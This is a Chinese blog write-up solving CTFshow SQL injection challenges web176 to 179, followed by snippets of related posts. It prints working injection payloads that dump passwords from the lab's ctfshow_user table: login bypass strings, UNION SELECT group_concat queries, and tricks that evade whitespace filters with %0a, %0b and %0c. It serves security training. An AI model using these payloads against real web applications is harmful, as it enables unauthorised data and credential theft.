CTFshow web(SQL注入176-179)

最新推荐文章于 2024-08-03 19:41:25 发布
最新推荐文章于 2024-08-03 19:41:25 发布
阅读量516 收藏 9
点赞数 11
文章标签: sql 数据库 CTFshow SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/csjjjd/article/details/136199345
版权

                                                                        web176

没啥好说的,直接上万能密码:

1' or username='flag

当然了还有别的方法:

1' union Select 1,2,group_concat(password) from ctfshow_user where username = 'flag' --+

 

                                                                      web177

没啥好说的,直接上万能密码:

1' or username='flag

 

白嫖不了,一眼看出过滤空格,验证:

发现回显,那就直接改变数字就好,就会返回不同的字段,这里教大家一招,很好用,把数字设置的很大就可以直接找到flag,不用一个个翻找

                                                                         web178

 经过测试发现/**/被过滤,那就换成反引号就好了

 99'union%0bselect'1',(select`password`from`ctfshow_user`where`username`='flag'),'3

或者:

'%0aUnion%0aSelect%0a1,2,group_concat(password)%0afrom%0actfshow_user%0awhere%0ausername='flag'%23

                                                                        web179

很多形式的空格类型被过滤,但是%0c还可以使用

'%0cUnion%0cSelect%0c1,2,group_concat(password)%0cfrom%0cctfshow_user%0cwhere%0cusername='flag'%23

希望文章能够帮助大家,谢谢!

补天阁
关注
ctfshow-web入门-sql注入-web171
HkD01L的博客
11-22 308
此题为 【从0开始学web】系列第一百七十一题 此系列题目从最基础开始,题目遵循循序渐进的原则 从此题开始的150道题全部为sql注入,准备好了吗?
ctfshow-web入门-sql注入-web172
HkD01L的博客
11-22 376
此题为 【从0开始学web】系列第一百七十二题 此系列题目从最基础开始,题目遵循循序渐进的原则 撸猫为主,要什么flag?
ctfshow web入门 SQl注入web171--web179
2301_81040377的博客
04-18 442
就能一次性查出25和26的,如果25存在就直接输出flag了,不然的话26存在也行。反正这种盲注问题用脚本就行了学的话看一下这篇文章。过滤了很简单的,当然是select啦,大小写绕过。还用用脚本注入的,但是我还没有成功过所以就…时间盲注,参考下面的文章,还是脚本做。,9999不存在时会查询id=3。我不知道怎么整的,看出是布尔盲注。进行猜测表格的id只有24个。没反应没事我们直接访问试试。是网站文件默认存放位置。本地测试,查询id为。还是base64解码。
CTFSHOW WEB入门 sql注入 web176-
sinat_41572027的博客
07-15 509
CTFSHOW WEB入门 sql注入 web176-
ctfshow-web入门-sql注入web176-web180)
最新发布
Welcome To Myon'Blog !
08-03 705
闭合后简单判断了下字段数是 3测试联合查询注入,存在关键字的过滤,包括 select 和 union(后面经过测试实际只过滤了 select)回显成功得到表名为 ctfshow_user题目中要求 username!='flag'拿到 flag:ctfshow{4dacb0f6-4795-43f4-8b76-d300234e40b6}
ctfshow_web176~180
qq_38634097的博客
05-29 211
不知道为什么,没有检测出来,看了官方的wp,过滤了select,union的。我的思路是,既然过滤了,先检测过滤了哪些字符,然后避开,我认为这比盲猜靠谱。解题思路:题目说对传入的参数进行了过滤,但是我们不知道过滤了什么,所以第一步我们要先确认过在这里插入图片描述。通过测试发现注释符被过滤了,即–+,#,%23都不可以使用,我们换一种思路,把sql后面的‘闭合。在这里,我们使用burp进行检测。最后我是用万能密码破的。
ctfshow sql注入漏洞 171-179
m0_56993542的博客
10-21 515
web171 题目已经给出了拼接的语句是带有单引号的所以我们要闭合并且利用-- 注释掉后面的单引号 1' order by 3-- A 首先查询字段有多少,我试了2,3,4,到4的时候端口异常所以判断为三个字段 -1' union select 1,2,3--+ 查看当前哪些数据可以回显 -1' union select 1,2,database()--+ 查看当前的数据库 -1' union select 1,2,table_name from information_schema.table
ctfshow web入门 sql注入 过滤注入 web176
sinat_41572027的博客
07-10 180
ctfshow web入门 sql注入 过滤注入 web176
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
Web安全主要关注Web应用中的漏洞,如SQL注入、跨站脚本攻击(XSS)、文件包含漏洞等。PHP是一种广泛使用的服务器端脚本语言,常用于构建动态网页,因此,理解PHP语法和特性对于解决这类问题至关重要。 【压缩包子文件...
【ctfshow】web篇-SQL注入 wp
孤桜懶契
08-21 4469
前言 记录web的题目wp,慢慢变强,铸剑。 SQL注入 web171 根据语句可以看到有flag没有被显示出来,让我们拼接语句来绕过 //拼接sql语句查找指定ID用户 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;"; GET传参会自己解码,注释可以用%23(#), --空格,–+等,或者拼接语句不用注释也行 判断有3个字段
CTFshow sql注入 上篇(web221-253)
Kradress的博客
04-20 4775
目录前言思路题解总结 前言 输入源码 思路 ################################ 题解 ################################ 总结 …
CTFshow sql注入 上篇(web171-220)
Kradress的博客
03-18 7250
目录前言题目web 171(万能密码)web 172(回显内容过滤,base64或者hex编码绕过)web 173(回显内容过滤,base64或者hex编码绕过)web 174 (盲注)总结 前言 师傅们加油!!! 题目 web 171(万能密码) //拼接sql语句查找指定ID用户 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;"; id存在注
CTFSHOW WEB入门——sql注入
Chur的博客
07-22 4757
ctfshow 靶场 web入门 sql注入系列
CTFSHOW-WEB入门SQL注入部分(大概是长期更新)
Npceer-一位网安初学者的博客
02-01 590
SQL注入0x01 web 171 不一定会所有题都放上来(懒) 但是我尽量 0x01 web 171 总算是开始刷sql注入题了 之前学了 但是没写几题 也算个纯萌新了 所以基础题会细一点 也为了加强自己记忆 1,2,3都能回显 继续直接爆表名 1'union select 1,2,table_name from information_schema.tables where table_schema=database() --+ 直接爆字段 记得ctfshow_user要加'' 我试了半天不知道
CTFshow之web171~180---SQL注入(1)
金 帛的博客
06-04 2480
ctfshow,SQL注入的wp
CTFshow刷题日记-WEB-SQL注入part1(171-184)
Love&Share
09-19 1137
SQL注入篇-共150道 mysql字符串函数 UPPER(s) 将字符串转换为大写 UCASE(s) 将字符串转换为大写 SUBSTRING(s, start, length) 从字符串 s 的 start 位置截取长度为 length 的子字符串 SUBSTRING_INDEX(s, delimiter, number) 返回从字符串 s 的第 number 个出现的分隔符 delimiter 之后的子串。 如果 number 是正数,返回第 number 个字符左边的字符串。
ctfshow web入门 sql注入(持续更新)
Lum1n0us's Blog
07-13 1356
文章目录web171web172web173web174web175web176web177web178 web171 第一题嘛,都是最基础的,单引号闭合,用联合查询注入即可。 1' order by 3-- - -1' union select 1,2,3-- - # 库名是ctfshow_web -1' union select 1,database(),3-- - # 表名是ctfshow_user -1' union select 1,group_concat(table_name),3 fro
ctf_show web入门 sql篇 171-239
weixin_48083470的博客
07-23 1605
ctfshow web入门 sql篇 171 很简单直接联合查询 172 和第一题一样的查询语句,不过在显示内容时有过滤 过滤了flag " ' union select id,if(username='flag','a',username),password from ctfshow_user2 %23 可以在查询时将结果替换 即可 173差不多同上题 也有 like,regexp 正则匹配的方式 比较 内容 174 内容过滤了flag 和数字 直接查我查不出来 flag里肯定会有数字 选择布尔盲注
ctfshow web入门 sql注入
03-17
SQL注入是一种常见的网络安全漏洞,它通过提交非法的SQL语句来欺骗Web应用程序,访问或修改数据库中的数据。通过在Web应用程序的输入字段中插入恶意代码,攻击者可以绕过安全措施并获得不应该拥有的敏感信息。为了...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值